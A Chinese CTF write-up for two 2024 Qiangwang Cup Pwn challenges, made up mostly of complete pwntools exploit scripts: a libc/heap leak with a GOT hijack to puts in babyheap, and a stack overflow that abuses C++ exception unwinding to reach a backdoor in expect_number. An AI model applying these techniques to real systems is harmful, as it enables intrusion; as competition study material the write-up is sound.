2024强网杯线上赛Pwn

极限晋级线下,一共只出了三道解多的,正常发挥吧

chat_with_me是学弟做的,简单贴下babyheap和expect_number

已完成强网拟态、网鼎杯、强网杯都晋级的壮举,线下见!

babyheap

靠劫持 libc 内部的 `*ABS*@got` 表项(IFUNC 解析出的 strncmp 等字符串函数指针)为 puts,再触发 putenv,从而把环境变量打印出来

from pwn import *
context(os='linux', arch='amd64', log_level='debug')  # debug: every byte on the wire is logged
context.terminal = ['tmux', 'sp', '-h']
local = 1  # 1 = spawn ./pwn locally, 0 = connect to the remote service
elf = ELF('./pwn')
# Target handle: same libc is assumed in both modes, and every offset
# further down is specific to this libc-2.35.so build.
p = process('./pwn') if local else remote('127.0.0.1', 9999)
libc = ELF('./libc-2.35.so')

# Thin I/O shorthands over the pwntools tube `p`.
def sd(s):
    """Raw send."""
    return p.send(s)


def sl(s):
    """Send followed by a newline."""
    return p.sendline(s)


def sa(n, s):
    """Wait for prompt `n`, then send `s` (no newline)."""
    return p.sendafter(n, s)


def sla(n, s):
    """Wait for prompt `n`, then send `s` plus a newline."""
    return p.sendlineafter(n, s)


def rc(n):
    """Receive up to `n` bytes."""
    return p.recv(n)


def rl():
    """Receive one line."""
    return p.recvline()


def ru(s):
    """Receive until `s` is seen."""
    return p.recvuntil(s)


def ra():
    """Receive everything until EOF."""
    return p.recvall()


def ia():
    """Hand the tube over to the terminal."""
    return p.interactive()


def uu32(data):
    """Little-endian unpack of at most 4 bytes, NUL-padded on the right."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Little-endian unpack of at most 8 bytes, NUL-padded on the right."""
    return u64(data.ljust(8, b'\x00'))

def lg(s):
    """Log the value of the global named by `s` in hex, e.g. "libc_base >> 0x7f...".

    `s` is passed to eval(), so it must only ever be a literal name (or
    expression) written in this script -- never text received from the target.
    """
    value = eval(s)
    success("{} >> 0x{:x}".format(s, value))

def bk(addr):
    """Attach gdb to `p` with a breakpoint at the absolute address `addr`."""
    breakpoint_cmd = "b *{}".format(hex(addr))
    gdb.attach(p, breakpoint_cmd)

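def debug(addr, PIE=True):
    """Attach gdb to `p` with a breakpoint at `addr`.

    With PIE=True `addr` is an offset into the main executable: the load
    base is taken from the second line of `pmap <pid>` (the first mapping
    listed, assumed to be the text segment -- verify if the breakpoint
    lands somewhere odd) and added before attaching.  With PIE=False
    `addr` is used as an absolute address.
    """
    if not PIE:
        gdb.attach(p, "b *{}".format(hex(addr)))
        return
    # p.pid is an int, so nothing untrusted reaches the shell here; the
    # pipe is closed by the with-block instead of lingering until GC.
    with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as maps:
        text_base = int(maps.readlines()[1], 16)
    gdb.attach(p, 'b *{}'.format(hex(text_base + addr)))
    pause()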

def cmd(op):
    """Pick menu option `op` at the main prompt."""
    choice = "{}".format(op)
    sla("Enter your choice: \n", choice)

def add(size):
    """Option 1: allocate a commodity of `size` bytes."""
    cmd(1)
    sla("Enter your commodity size \n", "{}".format(size))

def free(index):
    """Option 2: delete the commodity at `index`."""
    cmd(2)
    sla("Enter which to delete: \n", "{}".format(index))

def edit(index, content):
    """Option 3: overwrite the commodity at `index` with `content` (sent raw, no newline)."""
    cmd(3)
    sla("Enter which to edit: \n", "{}".format(index))
    sa("Input the content \n", content)

def show(index):
    """Option 4: print the commodity at `index`."""
    cmd(4)
    sla("Enter which to show: \n", "{}".format(index))

def env(op):
    """Option 5: the environment sub-menu; `op` is sent without a trailing newline."""
    cmd(5)
    sa("Maybe you will be sad !\n", "{}".format(op))

def magic(addr, content):
    """Option 6: write `content` at the 8-byte packed address `addr` (arbitrary write)."""
    cmd(6)
    sa("Input your target addr \n", p64(addr))
    sd(content)

# --- leak ---------------------------------------------------------------
# Three large chunks, two frees and a larger request; the stale fd/bk
# pointers left behind in freed chunk 1 are then read back with show().
# Note: free(3) names an index that no visible add() created -- either the
# indices are not zero-based or a line was lost; verify against the binary.
add(0x520)

add(0x500)
add(0x510)
free(1)
free(3)
add(0x590)
show(1)

ru("The content is here \n")
libc_ptr = rc(8)[-8:]                    # first qword: a pointer into libc
libc_base = uu64(libc_ptr) - 0x21b110    # offset valid for the shipped libc-2.35.so only
rc(8)                                    # skip one qword
heap_ptr = rc(8)[-8:]                    # next qword: a pointer into the heap
heap_base = uu64(heap_ptr) - 0x1950
lg("libc_base")
lg("heap_base")

puts = libc_base + libc.sym['puts']

# libc-internal GOT slots (the IFUNC-resolved "*ABS*@got" entries) that
# setenv/putenv call through.  Offsets are for the shipped libc-2.35.so
# only; the trailing name is the implementation normally stored there.
# Only putenv_got4 is used below; the others are alternative targets.
setenv_got1 = libc_base + 0x21a150  # __strchr_avx2
setenv_got2 = libc_base + 0x21a098  # __strlen_avx2

putenv_got1 = libc_base + 0x21a150  # __strchr_avx2
putenv_got2 = libc_base + 0x21a018  # __strnlen_avx2
putenv_got3 = libc_base + 0x21a160  # __memmove_avx_unaligned_erms
putenv_got4 = libc_base + 0x21a118  # __strncmp_avx2

rop_addr = heap_base + 0x1e90  # unused in this path, kept for reference

# --- hijack -------------------------------------------------------------
# Redirect the strncmp slot to puts; the next call through it (triggered
# by env(2), presumably putenv) then prints the string it meant to compare,
# which is how the environment gets leaked.  Which libc routine env(2)
# really reaches is inferred from the slot choice -- confirm in the binary.
magic(putenv_got4, p64(puts))

env(2)

ia()

expect_number

利用 continue 功能不断累加,并配合地址 +1,可以实现对 unk_5520 最低一字节的任意写,从而借助选项 4 的 call rdx 调用 sub_2984 函数

image-20241103180303975

cat gift没任何东西,被骗了

然后就是一个含有异常处理的栈溢出:把返回地址改成带后门的那个 try 块内的地址 +1 即可。原因是 unwinder 查 LSDA 的 call-site 表时用的是“返回地址 − 1”,+1 能保证查找落在该 try 范围内,于是异常抛出后会跳进对应的、含后门的 catch 处理块。

image-20241103180309858

image-20241103180323967

from pwn import *
context(os='linux', arch='amd64', log_level='debug')  # debug: every byte on the wire is logged
context.terminal = ['tmux', 'sp', '-h']
local = 1  # 1 = spawn ./expect_number locally, 0 = connect to the remote service
elf = ELF('./expect_number')
# Target handle; the system libc is loaded in both modes (only used for symbols).
p = process('./expect_number') if local else remote('39.107.90.219', 28738)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

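# Thin I/O shorthands over the pwntools tube `p`.
def sd(s):
    """Raw send."""
    return p.send(s)


def sl(s):
    """Send followed by a newline."""
    return p.sendline(s)


def sa(n, s):
    """Wait for prompt `n`, then send `s` (no newline)."""
    return p.sendafter(n, s)


def sla(n, s):
    """Wait for prompt `n`, then send `s` plus a newline."""
    return p.sendlineafter(n, s)


def rc(n):
    """Receive up to `n` bytes."""
    return p.recv(n)


def rl():
    """Receive one line."""
    return p.recvline()


def ru(s):
    """Receive until `s` is seen."""
    return p.recvuntil(s)


def ra():
    """Receive everything until EOF."""
    return p.recvall()


def ia():
    """Hand the tube over to the terminal."""
    return p.interactive()


# Unpack a short little-endian blob as an unsigned 32/64-bit value.
# Fix: the pad byte was written as b'\\x00' (a literal backslash, 4 bytes),
# which makes ljust() raise TypeError; it must be a single NUL.  The
# unpacking uses the standard library directly so it has no pwntools
# dependency.
def uu32(data):
    """Little-endian unpack of at most 4 bytes, NUL-padded on the right."""
    return int.from_bytes(data.ljust(4, b'\x00'), 'little')


def uu64(data):
    """Little-endian unpack of at most 8 bytes, NUL-padded on the right."""
    return int.from_bytes(data.ljust(8, b'\x00'), 'little')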

def lg(s):
    """Log the value of the global named by `s` in hex, e.g. "elf_base >> 0x55...".

    `s` is passed to eval(), so it must only ever be a literal name (or
    expression) written in this script -- never text received from the target.
    """
    value = eval(s)
    success("{} >> 0x{:x}".format(s, value))

def bk(addr):
    """Attach gdb to `p` with a breakpoint at the absolute address `addr`."""
    breakpoint_cmd = "b *{}".format(hex(addr))
    gdb.attach(p, breakpoint_cmd)

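def debug(addr, PIE=True):
    """Attach gdb to `p` with a breakpoint at `addr`.

    With PIE=True `addr` is an offset into the main executable: the load
    base is taken from the second line of `pmap <pid>` (the first mapping
    listed, assumed to be the text segment -- verify if the breakpoint
    lands somewhere odd) and added before attaching.  With PIE=False
    `addr` is used as an absolute address.
    """
    if not PIE:
        gdb.attach(p, "b *{}".format(hex(addr)))
        return
    # p.pid is an int, so nothing untrusted reaches the shell here; the
    # pipe is closed by the with-block instead of lingering until GC.
    with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as maps:
        text_base = int(maps.readlines()[1], 16)
    gdb.attach(p, 'b *{}'.format(hex(text_base + addr)))
    pause()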

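def cmd(op):
    """Pick menu option `op` at the main prompt.

    Fix: the prompt ended in "\\n" (backslash + 'n'), two characters the
    binary never prints, so sendlineafter() would block forever; the
    prompt must end in a real newline.
    """
    sla(">> waiting for your choice \n", str(op))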

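def go(num):
    """Option 1: play one round, answering `num` (0, 1 or 2).

    Fix: the prompt ended in "\\n" (backslash + 'n'), which the binary
    never prints, so sendlineafter() would block forever; it must end in
    a real newline.
    """
    cmd(1)
    sla(">> Which one do you choose? 2 or 1 or 0\n", str(num))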

# Operation for each round, as the binary asks them: 1 = '+', 2 = '-',
# 3 = '*', 4 = '/'.  Only the first 0x114 entries are consumed by the
# loops below; presumably the sequence is fixed (same seed) so it could be
# recorded once -- confirm if the remote behaves differently.
chose = [4,3,2,4,2,4,3,1,2,2,3,4,3,4,4,3,1,3,1,1,4,1,4,2,3,3,3,4,4,4,2,3,3,3,2,4,2,1,4,3,2,2,2,4,1,2,3,1,4,3,2,3,4,1,1,2,3,3,1,2,2,2,1,4,1,2,3,2,2,2,1,4,3,2,3,4,3,1,4,3,4,1,1,3,1,1,4,4,3,4,1,1,1,1,4,1,3,3,3,4,4,3,3,3,4,2,2,3,2,1,1,1,2,1,3,2,2,2,1,4,1,2,4,2,2,4,2,4,2,4,4,1,2,2,3,2,3,4,4,1,1,4,1,2,4,4,3,1,1,4,1,2,1,4,3,2,3,4,2,4,4,1,1,1,2,3,2,1,3,1,1,3,4,1,4,4,4,2,4,1,1,4,2,1,4,4,3,2,3,4,2,2,4,2,3,1,4,4,1,2,1,1,4,4,2,3,3,1,1,3,1,1,2,2,2,1,1,4,3,4,3,4,1,2,1,3,2,4,3,3,2,3,3,1,2,4,4,1,1,4,3,1,4,4,3,1,1,3,4,3,2,2,2,3,3,2,1,1,1,3,3,2,1,1,3,3,1,2,3,1,1,1,1,4,4,3,1,4,2,4,2,3,2,3,1,4,4,2,4,1,4,2,2,1,3,4,3,3,1,1,3,1,1,3,1,4,2,1,4,3,4,1,1,1,4,2,1,3,3,4,3,2,2,1,2,4,4,4,2,1,4,4,1,4,2,1,4,3,1,3,1,1,3,2,1,2,3,1,1,1,1,3,2,2,3,4,1,3,3,2,3,3,1,3,2,2,4,1,1,4,3,1,4,2,2,1,3,4,1,3,4,1,2,2,2,4,1,2,2,3,3,4,1,3,3,3,1,2,3,1,1,2,1,1,3,3,1,1,2,1,4,2,2,1,3,3,4,3,1,2,1,3,1,2,2,3,4,2,4,2,2,1,3,2,1,1,4,1,2,2,1,1,3,2,1,1,1,4,3,1,1,3,3,2,4,4,4,3,1,4,1,2,4,3,4,4,4,3,4,1,4,4,1,2,2,1,2,2,4,4,2,1,3,4,2,2,4,1,1,4,4,1,2,3,3,1,2,2,3,1,2,3,1,2,4,2,2,2,3,2,1,4,2,3,3,3,1,2,3,1,2,3,1,3,1,3,3,3,1,1,3,2,3,3,4,3,4,1,4,2,2,4,1,3,3,4,1,3,1,4,3,2,2,3,4,2,1,2,4,1,3,3,3,1,1,2,3,1,2,2,2,4,2,3,2,4,2,3,2,2,2,4,4,3,2,3,4,2,1,4,3,3,2,1,3,2,2,2,2,3,3,4,2,4,2,4,3,3,2,4,4,3,3,3,1,4,2,4,2,2,3,4,4,4,4,2,2,1,3,3,3,2,2,1,1,3,4,4,1,1,3,1,3,2,3,3,1,4,2,2,1,1,1,4,4,4,2,1,4,4,4,3,1,1,3,2,4,2,1,4,2,3,4,4,4,3,2,1,2,3,2,3,3,3,2,3,2,3,3,2,3,2,4,3,3,2,4,2,3,4,1,4,3,1,3,2,3,4,2,4,2,4,2,1,2,4,3,3,2,1,4,4,3,3,3,1,4,2,2,2,2,2,1,4,2,3,1,4,2,3,4,4,2,1,4,3,4,2,1,2,2,1,1,4,3,3,4,3,1,1,4,2,3,1,1,4,3,1,4,1,3,3,4,4,3,3,2,3,4,3,4,1,3,4,1,1,3,4,3,3,1,3,4,3,3,4,2,1,4,1,1,3,3,4,2,2,2,4,4,1,2,3,2,4,2,2,4,4,1,3,2,1,1,1,3,3,4,1,3,4,1,4,2,4,3,3,1,1,2,4,1,3,2,2,2,3,3,2,3,4,4,4,4,4,1,3,2,4,3,4,3,3,3,4,2,2,3,2,2,4,1,2,3,2,4,4,1,2,1,3,1,4,2,1,3,2,3,4,2,1,4,4,3,2,4,1,3,2,2,4,1,3,2,3,4,1,3,4,2,3,2,3,3,4,3,1,1,1,1,2,1,4,2,3,1,1,3,4,2,1,3,2,3,4,1,2,4,3,2,2,1,3,4,3,2,2,4,3,2,4,4,2,3,1,4,3,1,3,2,2,3,1,4,1,4,4,2,4,2,3,1,2,2,4,1,3,1,4,1,2,3,1,3,1,1,2,3,2,4,1,3,2,1,2,2,4
,1,4,3,2,2,3,4,3,2,4,2,2,3,2,3,1,2,1,1,3,3,3,4,2,3,2,4,3]

def show():
    """Option 2: print the round history."""
    cmd(2)

def submit():
    """Option 3: submit the accumulated value."""
    cmd(3)

def magic():
    """Option 4: the indirect call (call rdx) that reaches the vulnerable routine."""
    cmd(4)

flag1 = 3  # how many '+' rounds are still answered with 1
flag2 = 5  # how many '*' rounds are still answered with 2

# Drive the running value to 96 = 3 * 2^5: answer three '+' rounds with 1,
# then five '*' rounds with 2; every other round gets the answer that
# leaves the value unchanged (0 for '+'/'-', 1 for '*'/'/').  What the
# value is later used for is not visible here -- see the surrounding
# write-up.  Each round answers exactly once because chose[] only holds 1..4.
for op in chose[:0x40]:
    if op == 1:
        if flag1:
            flag1 -= 1
            go(1)
        else:
            go(0)
    elif op == 2:
        go(0)
    elif op in (3, 4):
        go(1)

for op in chose[0x40:0x114]:
    if op in (1, 2):
        go(0)
    elif op == 3:
        if flag2:
            flag2 -= 1
            go(2)
        else:
            go(1)
    elif op == 4:
        go(1)

# --- leak ---------------------------------------------------------------
show()
ru("History is : ")
rc(0x114)                               # skip the 0x114 history bytes (one per round played)
pie_ptr = rc(6)[-6:]                    # 6-byte PIE pointer that follows the history
elf_base = uu64(pie_ptr) - 0x4c60
lg("elf_base")

# Addresses in the binary (offsets from the write-up).  `catch` is the
# return address planted below: an address inside the try block whose
# handler contains the backdoor, +1 so the unwinder's (ret-1) lookup stays
# within the try range.  `backdoor` itself is unused here.
catch = elf_base + 0x2516
backdoor = elf_base + 0x253D
bss = elf_base + 0x5040 + 0xa00         # writable scratch area used as saved-rbp filler
lg("catch")

# --- stack overflow --------------------------------------------------
submit()
payload = p64(bss) * 5 + p64(catch)     # 40 bytes of filler, then the return address
magic()

sa("Tell me your favorite number.", payload)

ia()